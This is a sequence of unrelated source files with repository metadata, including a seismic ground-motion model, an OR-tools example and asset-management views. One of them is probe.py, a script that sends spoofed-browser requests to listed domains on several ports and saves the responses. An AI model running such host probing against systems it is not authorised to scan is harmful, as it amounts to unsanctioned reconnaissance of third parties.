        if not sessionid:
            return
        pv_key = 'pv:%s:%s' % (sessionid, self.request.path)
        if not cache.get(pv_key):
            self.object.increase_pv()
            cache.set(pv_key, 1, 30)
        uv_key = 'uv:%s:%s' % (sessionid, self.request.path)
        if not cache.get(uv_key):
            self.object.increase_uv()
            cache.set(uv_key, 1, 60*60*24)
|
[
"atlednolispe@gmail.com"
] |
atlednolispe@gmail.com
|
ba430f34c33e6f2def7f7405d3d6c58f5ee06de5
|
7e6e3b4929ecae9c010478149670f28d9e6beb29
|
/pygmm/abrahamson_silva_kamai_2014.py
|
eb5b12d44aa1ea7a3096abe1e2594e2fe3cea493
|
[
"MIT",
"ISC"
] |
permissive
|
nassermarafi/pygmm
|
8312740bd6f37c7f837dc18723e52f16d417e229
|
b97c1cbe85522bc7e546c99ec99ed902163cb000
|
refs/heads/master
| 2021-01-13T08:57:13.669149
| 2016-03-29T05:48:36
| 2016-03-29T05:48:36
| 54,947,879
| 0
| 2
| null | 2016-03-29T05:18:39
| 2016-03-29T05:18:39
| null |
UTF-8
|
Python
| false
| false
| 14,143
|
py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import division
import numpy as np
from scipy.interpolate import interp1d
from . import model
__author__ = 'Albert Kottke'
class AbrahamsonSilvaKamai2014(model.Model):
    """Abrahamson, Silva, and Kamai (2014, :cite:`abrahamson14`) model.
    This model was developed for active tectonic regions as part of the
    NGA-West2 effort.
    """
    NAME = 'Abrahamson, Silva, & Kamai (2014)'
    ABBREV = 'ASK14'
    # Reference velocity (m/sec)
    V_REF = 1180.
    # Load the coefficients for the model
    COEFF = model.load_data_file('abrahamson_silva_kamai_2014.csv', 2)
    PERIODS = COEFF['period']
    INDICES_PSA = np.arange(22)
    INDEX_PGA = -2
    INDEX_PGV = -1
    # Required/optional inputs with their valid ranges and defaults.
    PARAMS = [
        model.NumericParameter('dist_rup', True, None, 300),
        model.NumericParameter('dist_jb', True),
        model.NumericParameter('mag', True, 3, 8.5),
        model.NumericParameter('v_s30', True, 180, 1000),
        model.NumericParameter('depth_1_0', False),
        model.NumericParameter('depth_tor', False),
        model.NumericParameter('dip', True),
        model.NumericParameter('dist_crjb', False, default=15),
        model.NumericParameter('dist_x', False),
        model.NumericParameter('dist_y0', False),
        model.NumericParameter('width', False),
        model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),
        model.CategoricalParameter(
            'region', False,
            ['global', 'california', 'china', 'italy', 'japan', 'taiwan'],
            'global'
        ),
        model.CategoricalParameter(
            'vs_source', False, ['measured', 'inferred'], 'measured'),
        model.CategoricalParameter(
            'is_aftershock', False, [True, False], False),
        model.CategoricalParameter('on_hanging_wall', False,
                                   [True, False], False),
    ]
    def _check_inputs(self, **kwds):
        # Fill in model-average fault geometry when the caller omits it.
        super(AbrahamsonSilvaKamai2014, self)._check_inputs(**kwds)
        p = self.params
        if p['width'] is None:
            p['width'] = self.calc_width(p['mag'], p['dip'])
        if p['depth_tor'] is None:
            p['depth_tor'] = self.calc_depth_tor(p['mag'])
    def __init__(self, **kwds):
        """Initialize the model.
        Keyword Args:
            depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave
                velocity horizon beneath the site, :math:`Z_{1.0}` in (km).
                Used to estimate `depth_2_5`.
            depth_2_5 (Optional[float]): depth to the 2.5 km∕s shear-wave
                velocity horizon beneath the site, :math:`Z_{2.5}` in (km).
                If *None*, then it is computed from `depth_1_0` or `v_s30`
                and the `region` parameter.
            depth_tor (Optional[float]): depth to the top of the rupture
                plane (:math:`Z_{tor}`, km). If *None*, then the average
                model is used.
            depth_bor (Optional[float]): depth to the bottom of the rupture
                plane (:math:`Z_{bor}`, km). If *None*, then the average
                model is used.
            dip (float): fault dip angle (:math:`\phi`, deg).
            dist_jb (float): Joyner-Boore distance to the rupture plane
                (:math:`R_\\text{JB}`, km)
            dist_rup (float): closest distance to the rupture plane
                (:math:`R_\\text{rup}`, km)
            dist_x (float): site coordinate measured perpendicular to the
                fault strike from the fault line with the down-dip direction
                being positive (:math:`R_x`, km).
            dist_y0 (Optional[float]): the horizontal distance off the end of
                the rupture measured parallel to strike (:math:`R_{y0}`, km).
            mag (float): moment magnitude of the event (:math:`M_w`)
            mechanism (str): fault mechanism. Valid options: "SS", "NS", "RS".
            on_hanging_wall (Optional[bool]): If the site is located on the
                hanging wall of the fault. If *None*, then *False* is assumed.
            region (Optional[str]): region. Valid options: "global",
                "california", "china", "italy", "japan", "taiwan". If *None*,
                then "global" is used as a default value.
            v_s30 (float): time-averaged shear-wave velocity over the top 30 m
                of the site (:math:`V_{s30}`, m/s).
            vs_source (Optional[str]): source of the `v_s30` value. Valid
                options: "measured", "inferred"
            width (Optional[float]): Down-dip width of the fault. If *None*,
                then the model average is used.
        """
        super(AbrahamsonSilvaKamai2014, self).__init__(**kwds)
        # Compute the response at the reference velocity
        resp_ref = np.exp(self._calc_ln_resp(self.V_REF, np.nan))
        self._ln_resp = self._calc_ln_resp(self.params['v_s30'], resp_ref)
        self._ln_std = self._calc_ln_std(resp_ref)
    def _calc_ln_resp(self, v_s30, resp_ref):
        """Calculate the natural logarithm of the response.
        Args:
            v_s30 (float): site condition. Set `v_s30` to the reference
                velocity (e.g., 1180 m/s) for the reference response.
            resp_ref (Optional[:class:`np.array`]): response at the reference
                condition. Required if `v_s30` is not equal to reference
                velocity.
        Returns:
            :class:`np.array`: Natural log of the response.
        """
        c = self.COEFF
        p = self.params
        # Magnitude scaling
        f1 = self._calc_f1()
        if p['on_hanging_wall']:
            # Hanging-wall term
            f4 = self._calc_f4()
        else:
            f4 = 0
        # Depth to top of rupture term
        f6 = c.a15 * np.clip(p['depth_tor'] / 20, 0, 1)
        # Style of faulting
        if p['mechanism'] == 'RS':
            f7 = c.a11 * np.clip(p['mag'] - 4, 0, 1)
            f8 = 0
        elif p['mechanism'] == 'NS':
            f7 = 0
            f8 = c.a12 * np.clip(p['mag'] - 4, 0, 1)
        else:
            f7, f8 = 0, 0
        # Site term
        ###########
        v_1 = np.exp(-0.35 * np.log(np.clip(c.period, 0.5, 3) / 0.5) +
                     np.log(1500))
        vs_ratio = np.minimum(v_s30, v_1) / c.v_lin
        # Linear site model
        f5 = (c.a10 + c.b * c.n) * np.log(vs_ratio)
        # Nonlinear model
        mask = vs_ratio < 1
        f5[mask] = (
            c.a10 * np.log(vs_ratio) -
            c.b * np.log(resp_ref + c.c) +
            c.b * np.log(resp_ref + c.c * vs_ratio ** c.n)
        )[mask]
        # Basin term
        if v_s30 == self.V_REF or p['depth_1_0'] is None:
            # No basin response
            f10 = 0
        else:
            # Ratio between site depth_1_0 and model center
            ln_depth_ratio = np.log(
                (p['depth_1_0'] + 0.01) /
                (self.calc_depth_1_0(v_s30, p['region']) + 0.01)
            )
            slope = interp1d(
                [150, 250, 400, 700],
                np.c_[c.a43, c.a44, c.a45, c.a46],
                copy=False,
                bounds_error=False,
                fill_value=(c.a43, c.a46),
            )(v_s30)
            f10 = slope * ln_depth_ratio
        # Aftershock term
        if p['is_aftershock']:
            f11 = c.a14 * np.clip(1 - (p['dist_crjb'] - 5) / 10, 0, 1)
        else:
            f11 = 0
        # Regional adjustment terms (velocity and anelastic attenuation).
        if p['region'] == 'taiwan':
            freg = c.a31 * np.log(vs_ratio) + c.a25 * p['dist_rup']
        elif p['region'] == 'china':
            freg = c.a28 * p['dist_rup']
        elif p['region'] == 'japan':
            f13 = interp1d(
                [150, 250, 350, 450, 600, 850, 1150],
                np.c_[c.a36, c.a37, c.a38, c.a39, c.a40, c.a41, c.a42],
                copy=False,
                bounds_error=False,
                fill_value=(c.a36, c.a42),
            )(v_s30)
            freg = f13 + c.a29 * p['dist_rup']
        else:
            freg = 0
        return f1 + f4 + f5 + f6 + f7 + f8 + f10 + f11 + freg
    def _calc_ln_std(self, psa_ref):
        """Calculate the logarithmic standard deviation.
        Returns:
            :class:`np.array`: Logarithmic standard deviation.
        """
        p = self.params
        c = self.COEFF
        # Aleatory within-event (phi) and between-event (tau) terms.
        if p['region'] == 'japan':
            phi_al = c.s5 + (c.s6 - c.s5) * np.clip((p['dist_rup'] - 30) / 50,
                                                    0, 1)
        else:
            transition = np.clip((p['mag'] - 4) / 2, 0, 1)
            if p['vs_source'] == 'measured':
                phi_al = c.s1m + (c.s2m - c.s1m) * transition
            else:
                phi_al = c.s1e + (c.s2e - c.s1e) * transition
        tau_al = c.s3 + (c.s4 - c.s3) * np.clip((p['mag'] - 5) / 2, 0, 1)
        tau_b = tau_al
        # Remove period independent site amplification uncertainty of 0.4
        phi_amp = 0.4
        phi_b = np.sqrt(phi_al ** 2 - phi_amp ** 2)
        # The partial derivative of the amplification with respect to
        # the reference intensity
        deriv = ((-c.b * psa_ref) / (psa_ref + c.c) +
                 (c.b * psa_ref) /
                 (psa_ref + c.c * (p['v_s30'] / c.v_lin) ** c.n))
        deriv[p['v_s30'] >= c.v_lin] = 0
        tau = tau_b * (1 + deriv)
        phi = np.sqrt(phi_b ** 2 * (1 + deriv) ** 2 + phi_amp ** 2)
        ln_std = np.sqrt(phi ** 2 + tau ** 2)
        return ln_std
    @staticmethod
    def calc_width(mag, dip):
        """Compute the fault width based on equation in NGW2 spreadsheet.
        This equation is not provided in the paper.
        Args:
            mag (float): moment magnitude of the event (:math:`M_w`)
            dip (float): Fault dip angle (:math:`\phi`, deg)
        Returns:
            float: estimated fault width (:math:`W`, km)
        """
        return min(
            18 / np.sin(np.radians(dip)),
            10 ** (-1.75 + 0.45 * mag)
        )
    @staticmethod
    def calc_depth_tor(mag):
        """Calculate the depth to top of rupture (km).
        Args:
            mag (float): moment magnitude of the event (:math:`M_w`)
        Returns:
            float: estimated depth (km)
        """
        return np.interp(mag, [5., 7.2], [7.8, 0])
    @staticmethod
    def calc_depth_1_0(v_s30, region='california'):
        """Estimate the depth to 1 km/sec horizon (:math:`Z_{1.0}`) based on
        :math:`V_{s30}` and region.
        This is based on equations 18 and 19 in the :cite:`abrahamson14`
        and differs from the equations in the :cite:`chiou14`.
        Args:
            v_s30 (float): time-averaged shear-wave velocity over the top 30 m
                of the site (:math:`V_{s30}`, m/s).
        Keyword Args:
            region (Optional[str]): region of basin model. Valid options:
                "california", "japan". If *None*, then "california" is used as
                the default value.
        Returns:
            float: depth to a shear-wave velocity of 1,000 m/sec
                (:math:`Z_{1.0}`, km).
        """
        if region in ['japan']:
            # Japan
            power = 2
            v_ref = 412
            slope = -5.23 / power
        else:
            # Global
            power = 4
            v_ref = 610
            slope = -7.67 / power
        return np.exp(slope * np.log((v_s30 ** power + v_ref ** power) /
                                     (1360. ** power + v_ref ** power))) / 1000
    def _calc_f1(self):
        """Calculate the magnitude scaling parameter f1.
        Returns:
            :class:`np.array`: Model parameter f1.
        """
        c = self.COEFF
        p = self.params
        # Magnitude dependent taper
        dist = np.sqrt(
            p['dist_rup'] ** 2 +
            (c.c4 - (c.c4 - 1) * np.clip(5 - p['mag'], 0, 1)) ** 2
        )
        # Magnitude scaling
        # Need to copy c.a1 to that it isn't modified during the following
        # operations.
        f1 = np.array(c.a1)
        # Piecewise in magnitude around the break points c.m1 / c.m2.
        ma1 = (p['mag'] <= c.m2)
        f1[ma1] += (
            c.a4 * (c.m2 - c.m1) + c.a8 * (8.5 - c.m2) ** 2 +
            c.a6 * (p['mag'] - c.m2) +
            c.a7 * (p['mag'] - c.m2) +
            (c.a2 + c.a3 * (c.m2 - c.m1)) * np.log(dist) +
            c.a17 * p['dist_rup']
        )[ma1]
        f1[~ma1] += (
            c.a8 * (8.5 - p['mag']) ** 2 +
            (c.a2 + c.a3 * (p['mag'] - c.m1)) * np.log(dist) +
            c.a17 * p['dist_rup']
        )[~ma1]
        ma2 = np.logical_and(~ma1, p['mag'] <= c.m1)
        f1[ma2] += (c.a4 * (p['mag'] - c.m1))[ma2]
        ma3 = np.logical_and(~ma1, p['mag'] > c.m1)
        f1[ma3] += (c.a5 * (p['mag'] - c.m1))[ma3]
        return f1
    def _calc_f4(self):
        """Calculate the hanging-wall parameter f4.
        Returns:
            :class:`np.array`: Model parameter f4.
        """
        # Move this into a decorator?
        c = self.COEFF
        p = self.params
        t1 = min(90 - p['dip'], 60) / 45
        # Constant from page 1041
        a2hw = 0.2
        if p['mag'] <= 5.5:
            t2 = 0
        elif p['mag'] < 6.5:
            t2 = (1 + a2hw * (p['mag'] - 6.5) -
                  (1 - a2hw) * (p['mag'] - 6.5) ** 2)
        else:
            t2 = 1 + a2hw * (p['mag'] - 6.5)
        # Constants defined on page 1040
        r1 = p['width'] * np.cos(np.radians(p['dip']))
        r2 = 3 * r1
        h1 = 0.25
        h2 = 1.5
        h3 = -0.75
        if p['dist_x'] < r1:
            t3 = h1 + h2 * (p['dist_x'] / r1) + h3 * (p['dist_x'] / r1) ** 2
        elif p['dist_x'] < r2:
            t3 = 1 - ((p['dist_x'] - r1) / (r2 - r1))
        else:
            t3 = 0
        t4 = np.clip(1 - p['depth_tor'] ** 2 / 100, 0, 1)
        if p['dist_y0'] is None:
            t5 = np.clip(1 - p['dist_jb'] / 30, 0, 1)
        else:
            dist_y1 = p['dist_x'] * np.tan(np.radians(20))
            t5 = np.clip(1 - (p['dist_y0'] - dist_y1) / 5, 0, 1)
        f4 = c.a13 * t1 * t2 * t3 * t4 * t5
        return f4
|
[
"albert.kottke@gmail.com"
] |
albert.kottke@gmail.com
|
2d3f92f71fc31f4d7c139c4fdc29e656d9688f0e
|
8fcc27160f8700be46296568260fa0017a0b3004
|
/client/poser.py
|
cd36493534803bad45f413ccf12f09d8e1e82ef2
|
[] |
no_license
|
connoryang/dec-eve-serenity
|
5d867f4eedfa896a4ef60f92556356cafd632c96
|
b670aec7c8b4514fc47cd52e186d7ccf3aabb69e
|
refs/heads/master
| 2021-01-22T06:33:16.303760
| 2016-03-16T15:15:32
| 2016-03-16T15:15:32
| 56,389,750
| 1
| 0
| null | 2016-04-16T15:05:24
| 2016-04-16T15:05:24
| null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\common\modules\nice\client\_nastyspace\poser.py
from eve.devtools.script.svc_poser import Starbase
from eve.devtools.script.svc_poser import Structure
|
[
"masaho.shiro@gmail.com"
] |
masaho.shiro@gmail.com
|
8d3242c598f713960953ae179e75d5bd44a35ab9
|
fbe58422d18bd94e1c2321eb30aa494c876d2ff6
|
/GLOP_first_example.py
|
be8493a7cf9e97ce1952fdad21192264743dbe74
|
[] |
no_license
|
KKAnumalasetty/OR-tools
|
3e6a5e46e53ce23fecd6ea4a77e2016d08a1977d
|
e80c41873ecc04c40eaaa75e4fbfc1d983db9a1e
|
refs/heads/master
| 2021-03-22T07:37:27.000081
| 2019-10-09T06:16:30
| 2019-10-09T06:16:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,677
|
py
|
# -*- coding: utf-8 -*-
"""
GLOP
@author: Lalith
"""
from ortools.linear_solver import pywraplp
def LinearProgrammingExample():
    """Maximize 3x + 4y subject to three linear constraints with GLOP.

    Constraints: x + 2y <= 14, 3x - y >= 0, x - y <= 2.
    The optimum sits at the vertex x = 6, y = 4 (objective 34).
    """
    # Instantiate a Glop solver
    solver = pywraplp.Solver('LinearProgrammingExample',
                             pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
    # Creating 2 variables; They are unconstrained
    x = solver.NumVar(-solver.infinity(), solver.infinity(), 'x')
    y = solver.NumVar(-solver.infinity(), solver.infinity(), 'y')
    # Constraint 0: x + 2y <= 14.
    constraint0 = solver.Constraint(-solver.infinity(), 14)
    constraint0.SetCoefficient(x, 1)
    constraint0.SetCoefficient(y, 2)
    # Constraint 1: 3x - y >= 0.
    constraint1 = solver.Constraint(0, solver.infinity())
    constraint1.SetCoefficient(x, 3)
    constraint1.SetCoefficient(y, -1)
    # Constraint 2: x - y <= 2.
    constraint2 = solver.Constraint(-solver.infinity(), 2)
    constraint2.SetCoefficient(x, 1)
    constraint2.SetCoefficient(y, -1)
    # Objective function: 3x + 4y.
    objective = solver.Objective()
    objective.SetCoefficient(x, 3)
    objective.SetCoefficient(y, 4)
    objective.SetMaximization()
    # Solve the system.
    solver.Solve()
    opt_solution = 3 * x.solution_value() + 4 * y.solution_value()
    print('Number of variables =', solver.NumVariables())
    print('Number of constraints =', solver.NumConstraints())
    # The value of each variable in the solution.
    print('Solution:')
    print('x = ', x.solution_value())
    print('y = ', y.solution_value())
    # The objective value of the solution.
    print('Optimal objective value =', opt_solution)
# Run the example when the module is executed.
LinearProgrammingExample()
|
[
"lalithsrivatsa@users.noreply.github.com"
] |
lalithsrivatsa@users.noreply.github.com
|
ff6fe46dc0de7a4bf4e70750265b0268ffbf82b7
|
daf1c67652d178f7d6aab787d5a7816624c3b032
|
/build/catkin_generated/order_packages.py
|
4259e38afe23f5a4bfe9577abfc8561a1b31d8e8
|
[] |
no_license
|
Kushagraw12/Drone-simulation
|
04d2fb83f955b1127f236a9f2d9cfe92573465f9
|
37acc100f61c0d48e86678c94bc1ce1be06c9789
|
refs/heads/master
| 2023-01-21T10:23:35.611100
| 2020-11-30T21:20:41
| 2020-11-30T21:20:41
| 317,338,359
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 448
|
py
|
# generated from catkin/cmake/template/order_packages.context.py.in
# Machine-generated by catkin; edit the template, not this file.
source_root_dir = '/home/kush/Desktop/sem3/en203/src'
# Empty config strings deliberately yield [] rather than [''].
whitelisted_packages = ''.split(';') if '' != '' else []
blacklisted_packages = ''.split(';') if '' != '' else []
underlay_workspaces = '/home/kush/Desktop/sem3/en203/devel;/home/kush/catkin_ws/devel;/opt/ros/noetic'.split(';') if '/home/kush/Desktop/sem3/en203/devel;/home/kush/catkin_ws/devel;/opt/ros/noetic' != '' else []
[
"wadhwakushagra01@gmail.com"
] |
wadhwakushagra01@gmail.com
|
9b1ffa4556961c5aa4f5cbebf9853c8c7b2711b7
|
c461d817e155e3d18647108fb31129d815e04649
|
/Introduction_to_Python/Numeric.py
|
c4f0fd407e63387660209493b77d712f35f43a6d
|
[] |
no_license
|
OpentoWorld/PythonCodes
|
8f84ddc965038754c4b08afb91a74c2ac762bc04
|
f65e17bd7f4938c894109fa8195abe27790ef061
|
refs/heads/master
| 2020-08-28T10:29:33.892348
| 2020-01-23T09:09:23
| 2020-01-23T09:09:23
| 217,673,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29
|
py
|
# Minimal demo of Python's numeric literal types.
a=5      # int
b=5.5    # float
c=6+5j   # complex
print(a,b,c)
|
[
"noreply@github.com"
] |
OpentoWorld.noreply@github.com
|
c25e226899bc11fffc3b0bd3d9d99a106e4c3f48
|
52ba554bfaa5bd679035cb2858f9c90327201915
|
/probe.py
|
594afd3c73dcafc7af461c8ab55eaeb0fe976fca
|
[] |
no_license
|
benchungiscool/pyprobe
|
3ec5087b46460dd915bb8dd1aa3cec424b281558
|
39ea809f06550fb9f72e4b449567e02d3b6a4908
|
refs/heads/master
| 2022-11-05T07:49:52.731606
| 2020-06-19T18:40:19
| 2020-06-19T18:40:19
| 254,963,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,556
|
py
|
from concurrent.futures import ThreadPoolExecutor
import time
import requests
import sys
import os
## Require at least one CLI argument; print a usage hint and bail out otherwise.
if len(sys.argv) == 1:
    print("Please provide an input such as: probe.py domains.txt",
    "For more help do probe.py -h")
    exit()
## Everything after the script name is treated as an argument to parse below.
arguments = sys.argv[1:]
## Prints the help data
def DisplayHelp():
    """Print the contents of help.txt and terminate the program."""
    with open("help.txt", "r") as help_file:
        lines = help_file.readlines()
    # readlines() keeps each line's trailing newline, so joining with "\n"
    # reproduces the original double-spaced output.
    print("\n".join(lines))
    exit()
## Process input from a textfile
def ProcessInput(file):
    """Read non-empty lines from *file*.

    Returns the list of entries; when there are four or more, returns a
    2-tuple ``(second_half, first_half)`` so the caller can fan work out
    to two workers.
    """
    # Resolve the argument to a concrete path (an absolute path is left
    # untouched by the join; a relative one is anchored next to its
    # absolute location).
    folder = os.path.dirname(os.path.abspath(file))
    file = os.path.join(folder, file)
    with open(file, "r") as handle:
        raw_lines = handle.readlines()
    # Strip newlines and drop entries that end up empty.
    entries = [line.replace("\n", "") for line in raw_lines if line.replace("\n", "")]
    half = len(entries) // 2
    if half > 1:
        return entries[half:], entries[:half]
    return entries
## Returns headers for the request
def ConstructHeaders():
    """Return the browser-like HTTP headers used for every probe request."""
    headers = {}
    headers['User-Agent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
    headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    headers['Accept-Language'] = 'en-GB,en;q=0.5'
    headers['Accept-Encoding'] = 'gzip, deflate'
    # Ask servers not to track us, and don't keep the connection open.
    headers['DNT'] = "1"
    headers['Connection'] = 'close'
    return headers
## Store result in a text file
def StoreResult(domain, port, content, code, verbose=False,
                fail=False, http=False, https=False):
    """Write one HTTP(S) response body to ``<cwd>/<domain>/<domain><code>.html``.

    domain/port: probed target (port is a string, used only for logging).
    content: response body to persist; code: HTTP status used in the filename.
    verbose: when True (and *fail* is False) log the probed URL and status;
    http/https pick which scheme is printed.
    """
    # One directory per probed domain.
    if not os.path.isdir(domain):
        os.mkdir(domain)
    os.chdir(domain)
    ## Print response status if in verbose mode
    if verbose and not fail:
        if http:
            print("http://"+domain+":"+port, code)
        if https:
            print("https://"+domain+":"+port, code)
    ## Write response to file.  FIX: the explicit file.close() inside the
    ## with-block was redundant (the context manager already closes it).
    with open(domain+str(code)+".html", "w") as file:
        file.write(str(content))
    ## Move up ready for next write
    # NOTE(review): chdir-based navigation leaks the directory change if an
    # exception fires between the two chdir calls.
    os.chdir("..")
## Request worker
def TestForService(domain, port, session, verbose):
    """Probe *domain* on *port* over both http and https, storing responses.

    session: a requests.Session used to send both prepared requests.
    Network failures (timeout, refused connection, ...) are silently skipped.
    """
    ## Make some headers for a request
    headers = ConstructHeaders()
    ## Construct http request
    req = requests.Request("GET", "http://"+domain+":"+str(port),
                           headers=headers)
    prepped = req.prepare()
    ## Send request
    try:
        r = session.send(prepped, timeout=3)
        StoreResult(domain, port, r.text, r.status_code, verbose=verbose,
                    http=True)
    ## If request doesn't work, move on
    except Exception:
        pass
    ## Construct https request
    req = requests.Request("GET", "https://"+domain+":"+str(port),
                           headers=headers)
    prepped = req.prepare()
    ## Send request
    try:
        # BUG FIX: the response was never assigned here, so the https branch
        # stored the stale http response (or raised NameError when the http
        # request had failed).
        r = session.send(prepped, timeout=3)
        StoreResult(domain, port, r.text, r.status_code,
                    verbose=verbose, https=True)
    ## If it doesn't work, move on
    except Exception:
        pass
## Inititate scan
def SendRequests(domains, ports, verbose):
    """Probe every domain:port combination, writing results under ./out."""
    ## Make sure we are writing inside an "out" directory, creating it on demand.
    if "/out" not in os.getcwd():
        if not os.path.isdir("out"):
            os.mkdir("out")
        os.chdir("out")
    # One session shared across all probes.
    session = requests.Session()
    for target in domains:
        for target_port in ports:
            TestForService(target, target_port, session, verbose)
## Checks if the user has called help mode
if "-h" in arguments:
    DisplayHelp()
## Check for verbose mode, set to False by default
verbose = "-v" in arguments
## Information Parser.
# FIX: ports/domains now accumulate across all arguments instead of being
# reset every iteration -- previously a later ".txt" argument silently wiped
# any ports supplied with -p.
ports = ["80", "443"]
domains = []
for argument in arguments:
    ## Process ports supplied by user
    if "-p" in argument:
        # BUG FIX: str.replace() returns a new string; the original discarded
        # the result, so the literal "-p" prefix leaked into the port list.
        for port in argument.replace("-p", "").split(","):
            ports.append(str(port))
    ## Process domains supplied by user
    if ".txt" in argument:
        domains = ProcessInput(os.path.realpath(argument))
if __name__ == "__main__":
    # BUG FIX: ProcessInput() returns a tuple of two halves only for larger
    # inputs; the old len(domains) > 1 check wrongly treated a plain list of
    # 2-3 domain *strings* as two halves and probed them character by character.
    if isinstance(domains, tuple):
        # Two halves: probe them on two worker threads.
        with ThreadPoolExecutor(max_workers=2) as executor:
            executor.submit(SendRequests, domains[0], ports, verbose)
            executor.submit(SendRequests, domains[1], ports, verbose)
    else:
        # Small input (possibly none): probe sequentially.
        SendRequests(domains, ports, verbose)
|
[
"benchung61@gmail.com"
] |
benchung61@gmail.com
|
98d7b77bd4dcb42afc88107f439946ee04d57359
|
557d51cd6c7459f3492f6e5e6a44e10b9026b805
|
/osipkd/views/aset/kibf.py
|
07b8c5377ec39a4afad0f7f9e9292ab5862d534a
|
[] |
no_license
|
aagusti/zosipkd
|
e6a3bd8ca71b240dc3141c89dba252291c2c9ea7
|
fbb4fcc74d772a9f1692a4e8b45cb63ce77e85f2
|
refs/heads/master
| 2021-01-17T10:23:14.182025
| 2016-05-04T07:34:05
| 2016-05-04T07:34:05
| 28,517,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,824
|
py
|
import os
import uuid
from osipkd.tools import row2dict, xls_reader
from datetime import datetime
from sqlalchemy import not_, func, or_
from pyramid.view import (
view_config,
)
from pyramid.httpexceptions import (
HTTPFound,
)
import colander
from deform import (
Form,
widget,
ValidationFailure,
)
from osipkd.models import (
DBSession,
Group
)
from kibs import KibSchema
from osipkd.models.aset_models import AsetKategori, AsetKib, AsetPemilik
from datatables import ColumnDT, DataTables
from osipkd.views.base_view import BaseViews
from osipkd.models.pemda_model import Unit
# Session keys used to stash a failed form between requests
# ("Tambah/Edit kibf gagal" = "Add/Edit kibf failed" in Indonesian).
SESS_ADD_FAILED = 'Tambah kibf gagal'
SESS_EDIT_FAILED = 'Edit kibf gagal'
# Asset-category code prefix handed to the add/edit templates.
KAT_PREFIX = '06'
# Autocomplete widget for category names, backed by the headofnama endpoint.
kat_widget = widget.AutocompleteInputWidget(
    size=60,
    values = '/aset/kibf/headofnama/act',
    min_length=1)
def deferred_bertingkat(node, kw):
    """Deferred factory: build the 'Bertingkat' select from schema bindings."""
    options = kw.get('bertingkat', [])
    return widget.SelectWidget(values=options)
# (value, label) choices for the "Bertingkat" select
# ("Tidak" = no, "Bertingkat" = multi-storey).
bertingkat = (
    ('Tidak', 'Tidak'),
    ('Bertingkat', 'Bertingkat'),
)
def deferred_beton(node, kw):
    """Deferred factory: build the 'Beton' select from schema bindings."""
    options = kw.get('beton', [])
    return widget.SelectWidget(values=options)
# (value, label) choices for the "Beton" select
# ("Tidak" = no, "Beton" = concrete).
beton = (
    ('Tidak', 'Tidak'),
    ('Beton', 'Beton'),
)
class AddSchema(KibSchema):
    """colander/deform schema for creating a KIB 'F' asset row.

    Extends the shared ``KibSchema`` with the ``f_``-prefixed fields;
    most of them are optional (``missing=colander.drop``).
    """
    # Fixed asset-register type for this view family.
    kib = colander.SchemaNode(
        colander.String(),
        default='F',
        title="KIB",
        oid="kib")
    f_bertingkat_tidak = colander.SchemaNode(
        colander.String(),
        widget=widget.SelectWidget(values=bertingkat),
        #missing = colander.drop,
        default = 'Tidak',
        oid="f_bertingkat_tidak",
        title="Bertingkat")
    f_beton_tidak = colander.SchemaNode(
        colander.String(),
        widget=widget.SelectWidget(values=beton),
        #missing = colander.drop,
        default = 'Tidak',
        oid="f_beton_tidak",
        title="Beton")
    f_panjang = colander.SchemaNode(
        colander.Integer(),
        missing = colander.drop,
        title="Panjang")
    f_lebar = colander.SchemaNode(
        colander.Integer(),
        missing = colander.drop,
        title="Lebar")
    f_luas_lantai = colander.SchemaNode(
        colander.Integer(),
        missing = colander.drop,
        title="L. Lantai")
    f_lokasi = colander.SchemaNode(
        colander.String(),
        missing = colander.drop,
        title="Lokasi")
    f_dokumen_tanggal = colander.SchemaNode(
        colander.Date(),
        missing = colander.drop,
        title="Tgl. Dok")
    f_dokumen_nomor = colander.SchemaNode(
        colander.String(),
        missing = colander.drop,
        title="No. Dok")
    f_status_tanah = colander.SchemaNode(
        colander.String(),
        missing = colander.drop,
        title="Sts. Tanah")
    f_kode_tanah = colander.SchemaNode(
        colander.String(),
        missing = colander.drop,
        title="Kd. Tanah")
    f_luas_bangunan = colander.SchemaNode(
        colander.Integer(),
        missing = colander.drop,
        title="L.Bangunan")
class EditSchema(AddSchema):
    """AddSchema plus a hidden ``id`` node so existing rows can be edited."""
    id = colander.SchemaNode(colander.String(),
                    missing=colander.drop,
                    widget=widget.HiddenWidget(readonly=True))
class view_aset_kibf(BaseViews):
    """Pyramid views for asset rows with ``AsetKib.kib == 'F'``:
    DataTables grid, add/edit/delete forms and CSV export, all scoped to
    the unit code stored in the session.

    NOTE(review): this module uses Python 2 syntax
    (``except ValidationFailure, e``) and cannot run unmodified on Python 3.
    """
    # MASTER
    @view_config(route_name="aset-kibf", renderer="templates/kibs/list.pt",
                 permission="read")
    def aset_kibf(self):
        """Render the list page; grid rows are fetched via the 'act' JSON view."""
        params = self.request.params
        return dict(kib='kibf')
    @view_config(route_name="aset-kibf-act", renderer="json",
                 permission="read")
    def aset_kibf_act(self):
        """JSON backend for the DataTables grid of KIB 'F' rows."""
        ses = self.request.session
        req = self.request
        params = req.params
        url_dict = req.matchdict
        pk_id = 'id' in params and int(params['id']) or 0
        if url_dict['act']=='grid':
            # defining columns
            columns = []
            columns.append(ColumnDT('id'))
            columns.append(ColumnDT('units.kode'))
            columns.append(ColumnDT('units.nama'))
            columns.append(ColumnDT('kats.kode'))
            columns.append(ColumnDT('no_register'))
            #columns.append(ColumnDT('uraian'))
            columns.append(ColumnDT('kats.uraian'))
            #columns.append(ColumnDT('tahun'))
            columns.append(ColumnDT('tgl_perolehan', filter=self._DTstrftime))
            columns.append(ColumnDT('th_beli'))
            columns.append(ColumnDT('harga'))
            columns.append(ColumnDT('kondisi'))
